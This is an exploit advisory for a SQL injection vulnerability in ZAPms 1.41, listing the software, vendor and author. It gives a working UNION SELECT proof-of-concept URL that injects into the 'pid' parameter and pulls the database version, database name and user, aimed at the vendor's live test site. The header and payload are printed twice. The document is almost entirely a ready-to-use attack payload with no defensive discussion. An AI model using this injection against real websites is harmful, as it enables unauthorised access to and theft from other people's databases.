ZAPms 1.41 <= SQL Injection Vulnerability
[o] ZAPms <= SQL Injection Vulnerability
Software : ZAPms
Version : 1.41
Vendor : http://www.zapms.de/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
[o] Exploit
http://localhost/[path]/products?pid=[SQLi]
[o] PoC
http://www.zapms.de/test/products?pid=-14+union+select+1,2,3,4,5,6,7,8,9,version(),database(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,user(),43,44,45,46,47,48--&cid=0&tid=&page=&action=details&subaction=product
Software : ZAPms
Version : 1.41
Vendor : http://www.zapms.de/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
[o] Exploit
http://localhost/[path]/products?pid=[SQLi]
[o] PoC
http://www.zapms.de/test/products?pid=-14+union+select+1,2,3,4,5,6,7,8,9,version(),database(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,user(),43,44,45,46,47,48--&cid=0&tid=&page=&action=details&subaction=product